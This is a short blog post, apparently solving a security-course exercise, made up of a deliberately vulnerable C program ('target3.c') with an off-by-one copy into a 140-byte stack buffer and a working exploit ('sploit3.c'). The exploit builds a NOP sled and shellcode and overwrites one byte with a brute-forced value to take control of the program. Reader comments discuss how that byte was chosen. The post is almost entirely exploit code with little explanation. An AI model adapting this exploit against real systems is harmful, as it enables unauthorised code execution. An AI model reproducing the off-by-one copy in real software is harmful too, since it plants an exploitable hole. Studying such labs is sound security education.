Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 3

Buffer Overflowing Target 3

target3.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * NB.  target3 compiled -ggdb -fomit-frame-pointer -O2 ...
 *      ebp is not used and not pushed on the stack
 */

int nstrcpy(char *out, int outl, char *in)
{
 int i, len;

 len = strlen(in);
 if (len > outl)
  len = outl;

 for (i = 0; i <= len; i++)
  out[i] = in[i];
}

int bar(char *arg)
{
 char buf[140];

 nstrcpy(buf, sizeof buf, arg);
}

int foo(char *argv[])
{
 bar(argv[1]);
}

int main(int argc, char *argv[])
{
 if (argc != 2)
 {
  fprintf(stderr, "target3: argc != 2\n");
  exit(EXIT_FAILURE);
 }
 foo(argv);
 return 0;
}

sploit3.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target3"

int main(void)
{
 char *args[3];
 char *env[1];
 char buf[142];
 int i;

 for(i = 0; i < 142; i++){
  if(i < 140 - strlen(shellcode))
   buf[i] = '\x90';
  else if(i < 140)
   buf[i] = shellcode[i - 140 + strlen(shellcode)];
  else if(i < 141)
   buf[i] = '\x70';
  else 
   buf[i] = '\x00';
 }

 args[0] = TARGET; args[1] = buf ; args[2] = NULL;
 env[0] = NULL;

 if (0 > execve(TARGET, args, env))
  fprintf(stderr, "execve failed.\n");

 return 0;
}
Advertisements
  1. Manuel
    December 6, 2010 at 3:13 pm

    Very nice post. thank you for this. but i have question. why did you put \x70 to buf[140] ? how did you choose it?

    • Dimas Isyanuar Kurniawan
      December 6, 2010 at 4:21 pm

      hi!
      since we only able to overflow one byte, so there are 255 possibilities.
      To be honest I just brute force it. I tried several address, but mostly the start and end address of a function will works. Dunno why….

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: